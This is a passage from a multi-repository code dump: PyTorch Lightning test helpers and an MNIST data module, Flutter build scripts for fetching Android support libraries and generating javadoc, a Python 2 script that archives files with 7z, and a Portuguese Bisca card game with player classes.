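print(DEFAULT_SETTINGS.mix_target_key)      # "mixed_target"
```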
#### File: lightning/utils/helpers.py
```python
from typing import Any, Dict, Optional, Tuple
import numpy as np
import torch
from pytorch_lightning import LightningDataModule, LightningModule
from torch.utils.data import DataLoader, Dataset, IterableDataset, Subset
from fulmo.readers import IReader
class RandomDictDataset(Dataset):
def __init__(self, size: int, length: int):
self.len = length
self.data = torch.randn(length, size)
def __getitem__(self, index):
a = self.data[index]
b = a + 2
return {"a": a, "b": b}
def __len__(self):
return self.len
class RandomDataset(Dataset):
def __init__(self, size: int, length: int):
self.len = length
self.data = torch.randn(length, size)
def __getitem__(self, index):
return self.data[index]
def __len__(self):
return self.len
class RandomIterableDataset(IterableDataset):
def __init__(self, size: int, count: int):
self.count = count
self.size = size
def __iter__(self):
for _ in range(self.count):
yield torch.randn(self.size)
class RandomIterableDatasetWithLen(IterableDataset):
def __init__(self, size: int, count: int):
self.count = count
self.size = size
def __iter__(self):
for _ in range(len(self)):
yield torch.randn(self.size)
def __len__(self):
return self.count
class NpyGenerator(IReader):
    """Npy array reader abstraction. Generates random arrays instead of reading them from disk (test helper)."""
def __init__(
self,
input_key: Optional[str] = None,
output_key: Optional[str] = None,
shape: Tuple[int, int, int] = (256, 256, 3),
    ) -> None:
        """Create a new instance of NpyGenerator.
Args:
input_key: key to use from annotation dict
output_key: key to use to store the result
"""
super().__init__(input_key, output_key or input_key)
self.shape = shape
def __call__(self, element: Dict[str, Any]) -> Dict[str, np.ndarray]:
"""Generate random array and transfer it.
Args:
element: elem in your datasets
Returns:
Dict[`output_key`, np.ndarray]
"""
array = np.random.rand(*self.shape)
output = {self.output_key: array}
return output
class TestModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.backbone = torch.nn.Sequential(
torch.nn.Linear(32, 32),
torch.nn.ReLU(),
torch.nn.Dropout(),
)
self.head = torch.nn.Sequential(
torch.nn.Linear(32, 16),
torch.nn.Dropout(0.5),
torch.nn.ReLU(),
torch.nn.Linear(16, 8),
torch.nn.Dropout(0.5),
torch.nn.ReLU(),
torch.nn.Linear(8, 2),
)
def forward(self, x):
return self.head(self.backbone(x))
class BoringModel(LightningModule):
def __init__(self):
"""
Testing PL Module
Use as follows:
- subclass
- modify the behavior for what you want
class TestModel(BaseTestModel):
def training_step(...):
# do your own thing
or:
model = BaseTestModel()
model.training_epoch_end = None
"""
super().__init__()
self.model = TestModel()
self._train_data = DataLoader(RandomDataset(32, 64))
self._val_data = DataLoader(RandomDataset(32, 64))
self._test_data = DataLoader(RandomDataset(32, 64))
self._predict_data = DataLoader(RandomDataset(32, 64))
def set_train_data(self, value) -> None:
self._train_data = value
def set_val_data(self, value) -> None:
self._val_data = value
def set_test_data(self, value) -> None:
self._test_data = value
def set_predict_data(self, value) -> None:
self._predict_data = value
def forward(self, x):
return self.model(x)
def loss(self, batch, prediction):
# An arbitrary loss to have a loss that updates the model weights during `Trainer.fit` calls
return torch.nn.functional.mse_loss(prediction, torch.ones_like(prediction))
def step(self, x):
x = self(x)
out = torch.nn.functional.mse_loss(x, torch.ones_like(x))
return out
def training_step(self, batch, batch_idx):
output = self(batch)
loss = self.loss(batch, output)
return {"loss": loss}
def training_step_end(self, training_step_outputs):
return training_step_outputs
def training_epoch_end(self, outputs) -> None:
torch.stack([x["loss"] for x in outputs]).mean()
def validation_step(self, batch, batch_idx):
output = self(batch)
loss = self.loss(batch, output)
return {"x": loss}
def validation_epoch_end(self, outputs) -> None:
torch.stack([x["x"] for x in outputs]).mean()
def test_step(self, batch, batch_idx):
output = self(batch)
loss = self.loss(batch, output)
return {"y": loss}
def test_epoch_end(self, outputs) -> None:
torch.stack([x["y"] for x in outputs]).mean()
def configure_optimizers(self):
optimizer = torch.optim.SGD(self.model.parameters(), lr=0.1)
lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=1)
return [optimizer], [lr_scheduler]
def train_dataloader(self):
return self._train_data
def val_dataloader(self):
return self._val_data
def test_dataloader(self):
return self._test_data
def predict_dataloader(self):
return self._predict_data
class BoringDataModule(LightningDataModule):
def __init__(self, data_dir: str = "./"):
super().__init__()
self.data_dir = data_dir
self.non_picklable = None
self.checkpoint_state: Optional[str] = None
def prepare_data(self):
self.random_full = RandomDataset(32, 64 * 4)
def setup(self, stage: Optional[str] = None):
if stage == "fit" or stage is None:
self.random_train = Subset(self.random_full, indices=range(64))
self.dims = self.random_train[0].shape
if stage in ("fit", "validate") or stage is None:
self.random_val = Subset(self.random_full, indices=range(64, 64 * 2))
if stage == "test" or stage is None:
self.random_test = Subset(self.random_full, indices=range(64 * 2, 64 * 3))
self.dims = getattr(self, "dims", self.random_test[0].shape)
if stage == "predict" or stage is None:
self.random_predict = Subset(self.random_full, indices=range(64 * 3, 64 * 4))
self.dims = getattr(self, "dims", self.random_predict[0].shape)
def train_dataloader(self):
return DataLoader(self.random_train)
def val_dataloader(self):
return DataLoader(self.random_val)
def test_dataloader(self):
return DataLoader(self.random_test)
def predict_dataloader(self):
return DataLoader(self.random_predict)
__all__ = ["BoringModel", "NpyGenerator"]
```
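A smoke-test sketch for `BoringModel`, assuming a `pytorch-lightning` 1.x release compatible with the `*_epoch_end` hooks used above; `fast_dev_run` pushes a single batch through each loop. The import path is an assumption.

```python
import pytorch_lightning as pl

from fulmo.lightning.utils.helpers import BoringModel  # assumed import path

model = BoringModel()
trainer = pl.Trainer(fast_dev_run=True)
trainer.fit(model)
trainer.test(model)
```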
|
{
"source": "jexio/mnist",
"score": 2
}
|
#### File: mnist/datamodules/base.py
```python
import logging
import os
import random
import time
from typing import Dict, List, Optional, Tuple, Union, Any, Callable
import urllib.request
import torch
from torchvision.datasets import MNIST
from torchvision import transforms as transform_lib
from torch.utils.data import DataLoader, Dataset, random_split
from fulmo.core import BaseDataModule, BaseDataModuleParameters
from fulmo.settings import Stage
class _MNIST(Dataset):
"""Carbon copy of ``tests.helpers.datasets.MNIST``.
We cannot import the tests as they are not distributed with the package.
See https://github.com/PyTorchLightning/pytorch-lightning/pull/7614#discussion_r671183652 for more context.
"""
RESOURCES = (
"https://pl-public-data.s3.amazonaws.com/MNIST/processed/training.pt",
"https://pl-public-data.s3.amazonaws.com/MNIST/processed/test.pt",
)
TRAIN_FILE_NAME = "training.pt"
TEST_FILE_NAME = "test.pt"
cache_folder_name = "complete"
def __init__(
self, root: str, train: bool = True, normalize: tuple = (0.1307, 0.3081), download: bool = True, **kwargs
):
super().__init__()
self.root = root
self.train = train # training set or test set
self.normalize = normalize
self.prepare_data(download)
data_file = self.TRAIN_FILE_NAME if self.train else self.TEST_FILE_NAME
self.data, self.targets = self._try_load(os.path.join(self.cached_folder_path, data_file))
def __getitem__(self, idx: int) -> Tuple[torch.Tensor, int]:
img = self.data[idx].float().unsqueeze(0)
target = int(self.targets[idx])
if self.normalize is not None and len(self.normalize) == 2:
img = self.normalize_tensor(img, *self.normalize)
return img, target
def __len__(self) -> int:
return len(self.data)
@property
def cached_folder_path(self) -> str:
return os.path.join(self.root, "MNIST", self.cache_folder_name)
def _check_exists(self, data_folder: str) -> bool:
existing = True
for fname in (self.TRAIN_FILE_NAME, self.TEST_FILE_NAME):
existing = existing and os.path.isfile(os.path.join(data_folder, fname))
return existing
def prepare_data(self, download: bool = True):
if download and not self._check_exists(self.cached_folder_path):
self._download(self.cached_folder_path)
if not self._check_exists(self.cached_folder_path):
raise RuntimeError("Dataset not found.")
def _download(self, data_folder: str) -> None:
os.makedirs(data_folder, exist_ok=True)
for url in self.RESOURCES:
logging.info(f"Downloading {url}")
fpath = os.path.join(data_folder, os.path.basename(url))
urllib.request.urlretrieve(url, fpath)
@staticmethod
    def _try_load(path_data, trials: int = 30, delta: float = 1.0):
        """Resolve concurrent loading of the same file from multiple processes."""
res, exception = None, None
assert trials, "at least some trial has to be set"
assert os.path.isfile(path_data), f"missing file: {path_data}"
for _ in range(trials):
try:
res = torch.load(path_data)
# todo: specify the possible exception
except Exception as e:
exception = e
time.sleep(delta * random.random())
else:
break
if exception is not None:
# raise the caught exception
raise exception
return res
@staticmethod
def normalize_tensor(tensor: torch.Tensor, mean: float = 0.0, std: float = 1.0) -> torch.Tensor:
mean = torch.as_tensor(mean, dtype=tensor.dtype, device=tensor.device)
std = torch.as_tensor(std, dtype=tensor.dtype, device=tensor.device)
return tensor.sub(mean).div(std)
class MnistDataModule(BaseDataModule):
"""Standard MNIST, train, val, test splits and transforms.
Attributes:
data_dir: where to save/load the data
val_split: how many of the training images to use for the validation split
seed: starting seed for RNG.
"""
def __init__(
self,
data_dir: str,
parameters: Dict[str, BaseDataModuleParameters],
val_split: int = 5000,
seed: int = 42,
) -> None:
"""Create a new instance of MnistDataModule."""
super().__init__(data_dir, parameters)
self.data_dir = data_dir
self.val_split = val_split
self.normalize = True
self.seed = seed
def prepare_data(self):
"""Saves MNIST files to `data_dir`"""
MNIST(self.data_dir, train=True, download=True)
MNIST(self.data_dir, train=False, download=True)
def setup(self, stage: Optional[str] = None):
"""Split the train and valid dataset."""
extra = dict(transform=self.default_transforms) if self.default_transforms else {}
dataset = MNIST(self.data_dir, train=True, download=False, **extra)
train_length = len(dataset)
self.data_train, self.data_val = random_split(dataset, [train_length - self.val_split, self.val_split])
self.data_test = MNIST(self.data_dir, train=False, download=False, **extra)
@property
def collate_fn(self) -> Optional[Callable[[Dict[str, Any]], Dict[str, torch.Tensor]]]:
"""Get collate_fn."""
def collate(data):
data, labels = zip(*data)
data = torch.cat(data).unsqueeze(1)
labels = torch.tensor(labels)
return {"features": data, "target": labels}
return collate
@property
def default_transforms(self):
if self.normalize:
mnist_transforms = transform_lib.Compose(
[transform_lib.ToTensor(), transform_lib.Normalize(mean=(0.5,), std=(0.5,))]
)
else:
mnist_transforms = transform_lib.ToTensor()
return mnist_transforms
__all__ = ["MnistDataModule"]
```
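A standalone sketch of what the `collate_fn` above produces, using fake MNIST-shaped samples instead of the real dataset; the helper below mirrors the nested `collate` function.

```python
import torch


def collate(data):
    data, labels = zip(*data)
    data = torch.cat(data).unsqueeze(1)
    labels = torch.tensor(labels)
    return {"features": data, "target": labels}


samples = [(torch.randn(1, 28, 28), 7), (torch.randn(1, 28, 28), 3)]
batch = collate(samples)
print(batch["features"].shape)  # torch.Size([2, 1, 28, 28])
print(batch["target"])          # tensor([7, 3])
```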
#### File: mnist/utils/registry.py
```python
import os
import importlib
def registry(path: str, name: str) -> None:
    """Register an entire folder of modules.
Args:
path: A path to __init__ file.
name: A module name.
"""
module_dir = os.path.dirname(path)
for file in os.listdir(module_dir):
if os.path.isdir(os.path.join(module_dir, file)) and file != '__pycache__':
for subfile in os.listdir(os.path.join(module_dir, file)):
_ = os.path.join(module_dir, file, subfile)
if subfile.endswith(".py"):
class_name = subfile[: subfile.find(".py")] if subfile.endswith(".py") else subfile
_ = importlib.import_module(f"{name}.{class_name}")
continue
_ = os.path.join(module_dir, file)
if file.endswith(".py"):
class_name = file[: file.find(".py")] if file.endswith(".py") else file
_ = importlib.import_module(f"{name}.{class_name}")
__all__ = ["registry"]
```
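A usage sketch: calling `registry` from a package's `__init__.py` imports every module in that package so that decorator-based registries get populated. The package name below is hypothetical.

```python
# mnist/datamodules/__init__.py (hypothetical location)
from mnist.utils.registry import registry

registry(__file__, "mnist.datamodules")
```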
|
{
"source": "jexme/engine",
"score": 2
}
|
#### File: tools/android_support/download_android_support.py
```python
import os
import sys
import urllib2
import cStringIO
import zipfile
import json
# Path constants. (All of these should be absolute paths.)
THIS_DIR = os.path.abspath(os.path.dirname(__file__))
FLUTTER_DIR = os.path.abspath(os.path.join(THIS_DIR, '..', '..', '..'))
INSTALL_DIR = os.path.join(FLUTTER_DIR, 'third_party', 'android_support')
def GetInstalledVersion(out_file_name):
version_file = os.path.join(INSTALL_DIR, out_file_name + '.stamp')
if not os.path.exists(version_file):
return None
with open(version_file) as f:
return f.read().strip()
def getFile(url, out_file_name):
# Read latest version.
if url == GetInstalledVersion(out_file_name):
return
downloaded_file = urllib2.urlopen(url).read()
if not os.path.exists(INSTALL_DIR):
os.mkdir(INSTALL_DIR)
if (url.endswith('.aar')):
aar_zip = zipfile.ZipFile(cStringIO.StringIO(downloaded_file))
with open(os.path.join(INSTALL_DIR, out_file_name), 'w') as f:
f.write(aar_zip.read('classes.jar'))
else:
with open(os.path.join(INSTALL_DIR, out_file_name), 'w') as f:
f.write(downloaded_file)
# Write version as the last step.
with open(os.path.join(INSTALL_DIR, out_file_name + '.stamp'), 'w') as f:
f.write('%s\n' % url)
def main():
with open (os.path.join(THIS_DIR, 'files.json')) as f:
files = json.load(f)
for entry in files:
getFile(entry['url'], entry['out_file_name'])
if __name__ == '__main__':
sys.exit(main())
```
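The script above expects a `files.json` next to it containing a list of `{url, out_file_name}` entries; the sketch below writes a placeholder file with that shape (the URL is not a real artifact).

```python
import json

entries = [
    {
        "url": "https://example.com/android_support/some_library.aar",  # placeholder URL
        "out_file_name": "some_library.jar",
    },
]
with open("files.json", "w") as f:
    json.dump(entries, f, indent=2)
```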
#### File: engine/tools/gen_javadoc.py
```python
import argparse
import os
import subprocess
import sys
ANDROID_SRC_ROOT = 'flutter/shell/platform/android'
def main():
if not os.path.exists(ANDROID_SRC_ROOT):
print 'This script must be run at the root of the Flutter source tree'
return 1
parser = argparse.ArgumentParser(description='Runs javadoc on Flutter Android libraries')
parser.add_argument('--out-dir', type=str, required=True)
args = parser.parse_args()
if not os.path.exists(args.out_dir):
os.makedirs(args.out_dir)
classpath = [
ANDROID_SRC_ROOT,
'third_party/android_support/android_arch_lifecycle_common.jar',
'third_party/android_support/android_arch_lifecycle_viewmodel.jar',
'third_party/android_support/android_support_annotations.jar',
'third_party/android_support/android_support_compat.jar',
'third_party/android_support/android_support_fragment.jar',
'third_party/android_support/android_support_v13.jar',
'third_party/android_tools/sdk/platforms/android-29/android.jar',
'base/android/java/src',
'third_party/jsr-305/src/ri/src/main/java',
]
packages = [
'io.flutter.app',
'io.flutter.embedding.android',
'io.flutter.embedding.engine',
'io.flutter.embedding.engine.dart',
'io.flutter.embedding.engine.renderer',
'io.flutter.embedding.engine.systemchannels',
'io.flutter.plugin.common',
'io.flutter.plugin.editing',
'io.flutter.plugin.platform',
'io.flutter.util',
'io.flutter.view',
]
command = [
'javadoc',
'-classpath', ':'.join(classpath),
'-d', args.out_dir,
'-link', 'https://developer.android.com/reference/',
] + packages
print(' '.join(command))
return subprocess.call(command)
if __name__ == '__main__':
sys.exit(main())
```
|
{
"source": "Jexocn/python_scripts",
"score": 3
}
|
#### File: Jexocn/python_scripts/zipfiles.py
```python
import os
import sys
import subprocess
import re
import glob
ignores = ['.git']
def fnames_filter(fnames):
for fname in ignores:
if fname in fnames:
fnames.remove(fname)
def gen_zipfile_name(dirname, start_id):
while True:
zipfname = os.path.join(dirname, "{:05d}.7z".format(start_id))
if not os.path.exists(zipfname) and len(glob.glob("{0}.[0-9][0-9]*".format(zipfname))) == 0:
return zipfname, start_id + 1
start_id += 1
def zip_file(dirname, fname, id_dict):
full_path = os.path.join(dirname, fname)
if os.path.isfile(full_path) and full_path != self_path:
r = re.search("\.7z(\.\d+)?$", fname)
if not r and not zipped.has_key(full_path):
basename, extname = os.path.splitext(full_path)
if basename2zip.has_key(basename):
zip_fname = basename2zip[basename]
else:
if id_dict.has_key(dirname):
zip_file_id = id_dict[dirname]
else:
zip_file_id = 0
zip_fname, zip_file_id = gen_zipfile_name(dirname, zip_file_id)
id_dict[dirname] = zip_file_id
print "zip [{0}] ===> [{1}]".format(full_path, zip_fname)
cmds = ['7z', 'a', '-mhe=on']
if volume_size:
cmds.append('-v{0}'.format(volume_size))
if passwd:
cmds.append('-p{0}'.format(passwd))
cmds.extend([zip_fname, full_path])
r = subprocess.call(cmds)
if r == 0:
print "zip [{0}] ===> [{1}] ok".format(full_path, zip_fname)
basename2zip[basename] = zip_fname
if remove_origin:
print "remove [{0}]".format(full_path)
os.remove(full_path)
print "remove [{0}] done".format(full_path)
else:
print "zip [{0}] --> [{1}] fail, error code is {2}".format(full_path, zip_fname, r)
elif not r and remove_origin:
print "remove [{0}]".format(full_path)
os.remove(full_path)
print "remove [{0}] done".format(full_path)
def zip_walk(arg, dirname, fnames):
fnames_filter(fnames)
fnames.sort()
for fname in fnames:
zip_file(dirname, fname, arg)
def make_zip_file_list(zip_info):
lines = [re.split('\s+', line.strip()) for line in zip_info.split('\n')]
fields_k = None
field_names = ["Date", "Time", "Attr", "Size", "Compressed", "Name"]
for k in xrange(0, len(lines)):
line = lines[k]
all_field_found = True
for name in field_names:
if not name in line:
all_field_found = False
break
if all_field_found:
fields_k = k
break
dash_begin = None
dash_end = None
for k in xrange(fields_k+1, len(lines)):
line = lines[k]
if len(line) > 0:
all_dash = True
for s in line:
if not re.match('\-+$', s):
all_dash = False
break
if all_dash and all_dash > 0:
if not dash_begin:
if 'Name' in lines[k-1]:
dash_begin = k
elif not dash_end:
dash_end = k
Name_k = None
for k in xrange(0, len(lines[fields_k])):
if lines[fields_k][k] == 'Name':
Name_k = k
break
return [lines[k][Name_k] for k in xrange(dash_begin+1, dash_end)]
def check_file(dirname, fname, zipped):
full_path = os.path.join(dirname, fname)
if os.path.isfile(full_path):
if re.search("\.7z(\.0*1)?$", fname):
print "check [{0}]".format(full_path)
if passwd:
r = subprocess.check_output(['7z', 'l', '-p{0}'.format(passwd), full_path])
else:
r = subprocess.check_output(['7z', 'l', full_path])
for fn in make_zip_file_list(r):
full_fn = os.path.join(dirname, fn)
base_fn, ext_fn = os.path.splitext(full_fn)
zipped[full_fn] = full_path
basename2zip[base_fn] = full_path
print "check [{0}] done".format(full_path)
def check_walk(arg, dirname, fnames):
fnames_filter(fnames)
for fname in fnames:
check_file(dirname, fname, arg)
def zip_files(top_path):
os.path.walk(top_path, zip_walk, {})
def check_zipped(top_path):
zipped = {}
os.path.walk(top_path, check_walk, zipped)
print "----------------------------------------"
print "zipped:"
for (k,v) in zipped.items():
print k, "->", v
print "basename2zip:"
for (k,v) in basename2zip.items():
print k, "->", v
print "----------------------------------------"
return zipped
if __name__ == "__main__":
self_path = os.path.abspath(sys.argv[0])
argc = len(sys.argv)
passwd = None
remove_origin = False
volume_size = None
top_path = os.path.join(os.path.dirname(self_path))
if argc > 1 and len(sys.argv[1]) > 0:
passwd = sys.argv[1]
if argc > 2:
remove_origin = int(sys.argv[2]) == 1
if argc > 3 and len(sys.argv[3]) > 0:
top_path = os.path.abspath(sys.argv[3])
if argc > 4:
volume_size = sys.argv[4]
assert re.match("\d+[bkmg]$", volume_size)
print "zip files in [{0}] passwd:{1} remove_origin:{2} volume_size:{3}".format(top_path, passwd, remove_origin, volume_size)
basename2zip = {}
zipped = check_zipped(top_path)
zip_files(top_path)
```
|
{
"source": "Jexp97/Bisca_JV_num_01",
"score": 3
}
|
#### File: Jexp97/Bisca_JV_num_01/classes_base.py
```python
from random import shuffle
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
#import tensorflow as tf
#from tensorflow import keras
import numpy as np
class Carta:
    # A class that defines what a card is.
    def __init__(self, naipe, numero, pontos=0):
        # naipe (suit): PAUS; OUROS; COPAS; ESPADAS
        # numero (rank): A(1),2,3,...,J,Q,K
        # pontos (points): depends on the game. By default, every card gets 0.
        self.__naipe = naipe  # Of type string
        self.__numero = numero  # Of type string
        self.__pontos = pontos  # Of type integer
@property
def naipe(self):
# retorna o naipe da carta
return self.__naipe
@property
def numero(self):
# retorna o numero da carta
return self.__numero
@property
def pontos(self):
# retorna a quantidade de pontos da carta
return self.__pontos
def __str__(self):
# retorna o número e o naipe da carta. Por exemplo, 3.OUROS
# lembrando que tanto _numero quanto _naipe são strings.
return self.__numero + '.' + self.__naipe
class Baralho:
    # A deck is composed of cards. Here, the base is the French deck.
    # This class uses the Carta class and serves as a base for other classes to inherit from.
def __init__(self):
# O atributo cartas_no_baralho guarda a sequência de cartas que compõem o baralho.
self._cartas_no_baralho = []
self._naipes = ("ESPADAS", "PAUS", "COPAS", "OUROS")
self._numeros = ("A", "2", "3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K", "Joker")
def embaralhar(self):
#Esta função embaralha a sequência do atributo cartas_no_baralho. É necessário importar o módulo random do python.
shuffle(self._cartas_no_baralho)
def tirar_uma_carta(self, posicao=None):
# Esta função tira a carta do topo do baralho na posição indicada e o devolve.
if (posicao != None):
return self._cartas_no_baralho.pop(posicao)
else:
return self._cartas_no_baralho.pop()
def __len__(self):
# Vai devolver o comprimento de __cartas_no_baralho.
return len(self._cartas_no_baralho)
def __str__(self):
# Vai devolver o conteúdo do baralho
conteudo_do_baralho = ""
for carta in self._cartas_no_baralho:
conteudo_do_baralho = (carta.__str__() + "\n") + conteudo_do_baralho
return conteudo_do_baralho
def contar_pontos(self):
# somar a quantidade de pontos no baralho
pontos = 0
for carta in self._cartas_no_baralho:
pontos += carta.pontos
return pontos
def adicionar_carta(self, carta):
# adicionando uma carta à pilha
self._cartas_no_baralho.append(carta)
class BaralhoDeBisca(Baralho):
def __init__(self, n_par_de_jogadores = True):
        # A bisca deck contains 40 cards ("dirty deck") and, if the number of players
        # is odd, the 2s must be removed.
super().__init__()
self._numeros = ["A", "2", "3", "4", "5", "6", "7", "J", "Q", "K"]
self._pontos = {"A": 11, "2": 0, "3": 0, "4": 0, "5": 0, "6": 0, "7": 10, "J": 3, "Q": 2, "K": 4}
#criando o baralho
if (not n_par_de_jogadores):
# removendo '2' dos _numeros
self._numeros.remove('2')
for naipe in self._naipes:
for numero in self._numeros:
self._cartas_no_baralho.append(Carta(naipe,numero,self._pontos[numero]))
class Jogador:
    # Base class for players
def __init__(self, nome):
self._nome = nome
self._pontos = 0
@property
def nome(self):
return self._nome
@property
def pontos(self):
return self._pontos
@pontos.setter
def pontos(self, novos_pontos):
self._pontos = novos_pontos
def somar_pontos(self, novos_pontos):
# novos_pontos pode ser tanto positivo quanto negativo!!
soma = self._pontos + novos_pontos
if (soma > 0):
self._pontos = soma
else:
self.pontos = 0
class JogadorDeBisca(Jogador):
    # Class to be used for the bisca player
tamanho_max_mao = 3
def __init__(self, nome):
super().__init__(nome)
# Lista vai guardar o conteúdo da mão
self._mao = []
# Variável do tipo Baralho vai guardar a pilha de pontos (cartas)
self._pilha_de_pontos = Baralho()
def escolhe_carta_para_jogar(self, carta_da_mesa=None ,cartas_jogadas_na_mesa=None):
# Função para a escolha da carta a ser jogada pelo jogador humano
while(True):
# Mostrando as cartas na mão
print(self.nome)
print(self) # Deve imprimir as cartas da mão
if len(self._mao) == 3:
try:
print('Qual carta jogar? (1), (2) ou (3): ', end='')
carta_escolhida = input()
if (carta_escolhida != '1' and carta_escolhida != '2' and carta_escolhida != '3'):
raise
# Se a entrada for válida, saida do loop e devolva o valor da carta_escolhida
break
except:
print('Entrada inválida!')
elif len(self._mao) == 2:
try:
print('Qual carta jogar? (1) ou (2): ', end='')
carta_escolhida = input()
if (carta_escolhida != '1' and carta_escolhida != '2'):
raise
# Se a entrada for válida, saida do loop e devolva o valor da carta_escolhida
break
except:
print('Entrada inválida!')
else:
try:
print('Jogue sua última carta pressionando (1): ', end='')
carta_escolhida = input()
if (carta_escolhida != '1'):
raise
# Se a entrada for válida, saida do loop e devolva o valor da carta_escolhida
break
except:
print('Entrada inválida!')
return carta_escolhida
def adicionar_carta_na_mao(self, carta):
# carta deve ser do tipo Carta
self._mao.append(carta)
def retirar_carta_da_mao(self, posicao):
# vai retirar a carta da mão na posição marcada pelo parâmetro posicao
return self._mao.pop(int(posicao) - 1)
def __str__(self):
# Vai devolver uma string com o conteúdo da mão em um formato adequado.
conteudo_da_mao = ""
for carta in self._mao:
conteudo_da_mao = conteudo_da_mao + (carta.__str__() + " ")
return conteudo_da_mao
@property
def pilha_de_pontos(self):
return self._pilha_de_pontos
def adicionar_carta_na_pilha (self, carta):
# adiciona uma carta na pilha de pontos
self._pilha_de_pontos.adicionar_carta(carta)
def __len__(self):
# devolve o comprimento da lista _mao
return len(self._mao)
class DummyPlayer(JogadorDeBisca):
    # This player always chooses the first card in its hand
def __init__(self, nome='Dummy'):
super().__init__(nome)
# Substitui o nome da carta por um ID ordenado pela força da carta
self._ID_de_carta = {"2": 0.1, "3": 0.2, "4": 0.3, "5": 0.4, "6": 0.5,
"7": 0.6, "J": 0.7, "Q": 0.8, "K": 0.9, "A": 1.0}
# Substitui o naipe por um ID
self._ID_de_naipe = {"ESPADAS": 0.25, "PAUS": 0.5, "COPAS": 0.75, "OUROS": 1.0}
def escolhe_carta_para_jogar(self, carta_da_mesa=None ,cartas_jogadas_na_mesa=None):
# Função que recebe a carta da mesa, as cartas já jogadas e escolhe
# uma na carta na mão
# No caso do DummyPlayer, a carta jogada sempre será a primeira disponível (1)
return 1
# Training is not working well yet :(
'''
class SmartPlayer(JogadorDeBisca):
# Este jogador tem uma rede neural treinada para escolher uma carta da mão
def __init__(self, nome='Smart'):
super().__init__(nome)
# Substitui o nome da carta por um ID ordenado pela força da carta
self._ID_de_carta = {"2": 0.1, "3": 0.2, "4": 0.3, "5": 0.4, "6": 0.5,
"7": 0.6, "J": 0.7, "Q": 0.8, "K": 0.9, "A": 1.0}
# Substitui o naipe por um ID
self._ID_de_naipe = {"ESPADAS": 0.25, "PAUS": 0.5, "COPAS": 0.75, "OUROS": 1.0}
# Criando a arquitetura da rede neural responsável pelas decisões de qual carta jogar
entradas = keras.Input(shape=(14,))
x = keras.layers.Dense(14, activation='relu', name='first_layer')(entradas)
x = keras.layers.Dense(7, activation='relu', name='second_layer')(x)
x = keras.layers.Dense(4, activation='relu', name='third_layer')(x)
saidas = keras.layers.Dense(3, activation='softmax', name='last_layer')(x)
self._tomador_de_decisao = keras.Model(inputs=entradas, outputs=saidas, name='tomador_de_decisao')
# Compilando o modelo. Ainda não sei se será necessário
self._tomador_de_decisao.compile(optimizer='adam',
loss=tf.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=[tf.metrics.SparseCategoricalAccuracy()])
# Carregando os parâmetros da rede treinada
self._tomador_de_decisao.load_weights('pesos_da_rede_neural_treinada_para_smart_player')
def salvar_pesos_da_rede(self, nome_do_arquivo_de_saida='pesos_salvos'):
# Esta função salva no disco os pesos da rede neural
try:
self._tomador_de_decisao.save_weights(nome_do_arquivo_de_saida)
except:
print('Algo deu errado na hora de salvar os pesos!')
raise
else:
print('Pesos da rede salvo com sucesso!')
def escolhe_carta_para_jogar(self, carta_da_mesa=None, cartas_jogadas_na_mesa=None):
# A partir das cartas na mão, da carta da mesa e das cartas já jogadas (x)
# vai escolher uma carta a ser jogada (y)
# A primeira coisa a se fazer e transformar as entradas em uma lista (numpy)
# que tem a ordem [ID_carta_1, ID_naipe_1, ..., ID_naipe_3, ID_carta_mesa, ID_naipe_mesa,...
# ... ID_carta_ja_jogada_1, ID_naipe_ja_jogado_1, ..., ID_naipe_ja_jogado_3]
#
# Essa lista deve ter um conter 14 itens. Caso não haja alguma informação,
# deve-se preencher com 0 a posição (por exemplo, não existe cartas jogadas ainda).
lista_de_entrada_do_decisor = []
# Preenchendo com o conteúdo da mão
for carta_na_mao in self._mao:
# Adiciona ID_carta
lista_de_entrada_do_decisor.append(self._ID_de_carta[
carta_na_mao.numero
])
# Adiciona ID_naipe
lista_de_entrada_do_decisor.append(self._ID_de_naipe[
carta_na_mao.naipe
])
# Se a mão tinha menos do que 3 cartas, devo preencher o restante das posições
# com 0.
while (len(lista_de_entrada_do_decisor) < 6):
lista_de_entrada_do_decisor.append(0)
# Preenchendo com o conteúdo da carta da mesa
# Lembrando: carta_da_mesa deve ser do tipo Carta
if carta_da_mesa != None:
lista_de_entrada_do_decisor.append(self._ID_de_carta[
carta_da_mesa.numero
])
lista_de_entrada_do_decisor.append(self._ID_de_naipe[
carta_da_mesa.naipe
])
# Preenchendo com o conteúdo das cartas jogadas
# Lembrando: cartas_jogadas_na_mesa deve ser uma lista com itens do tipo Carta
if cartas_jogadas_na_mesa != None:
for carta_ja_jogada in cartas_jogadas_na_mesa[:-1]:
# cartas_jogadas_na_mesa contabiliza todas as jogadas,
# isto é, numa mesa de 4 jogadores essa lista tem tamanho 4.
# Como só me interesso pela jogada dos outros jogadores,
# só preciso das n-1 primeiras entradas dessa lista.
if carta_ja_jogada != '':
# Se tem carta jogada, adiciona na lista
lista_de_entrada_do_decisor.append(self._ID_de_carta[
carta_ja_jogada.numero
])
lista_de_entrada_do_decisor.append(self._ID_de_naipe[
carta_ja_jogada.naipe
])
else:
# Caso contrário, adiciona 0 para o número e o naipe
lista_de_entrada_do_decisor.append(0)
lista_de_entrada_do_decisor.append(0)
# A lista de cartas_jogadas_na_mesa pode estar incompleta.
# Neste caso, deve-se preencher lista_de_entrada_do_decisor com 0s.
while (len(lista_de_entrada_do_decisor) < 14):
lista_de_entrada_do_decisor.append(0)
# Fazendo uma checagem de segurança
if (len(lista_de_entrada_do_decisor) != 14):
# Pare tudo que deu algo errado
raise
# Com essa lista montada, podemos colocá-la na entrada do decisor,
# gerando uma saída com três elementos (um para cada carta)
# A carta a ser jogada vai depender de qual desses elementos é o maior
# decisao = self._tomador_de_decisao(tf.convert_to_tensor(np.array([[lista_de_entrada_do_decisor],], dtype=np.float32)))
decisao = self._tomador_de_decisao(np.array([lista_de_entrada_do_decisor,]))
#print(decisao[0][0])
# É possível que decisao seja um tensor, o que mudaria a forma de acesso.
# decisao[0] --> carta_1
# decisao[1] --> carta_2
# decisao[2] --> carta_2
# Procurar o índice do argumento máximo
escolha = np.argmax(decisao) + 1
# argmax retorna um valor entre 0 e 2. Por isso, adiciono 1 para ficar compatível
# com a lógica.
# Preciso fazer o tratamento caso a mão tenha menos de três cartas e o decisor
# acabe escolhendo uma posição que não tenha carta
if len(self._mao) < 3 and escolha == 3:
# Escolheu uma posição que não existe carta
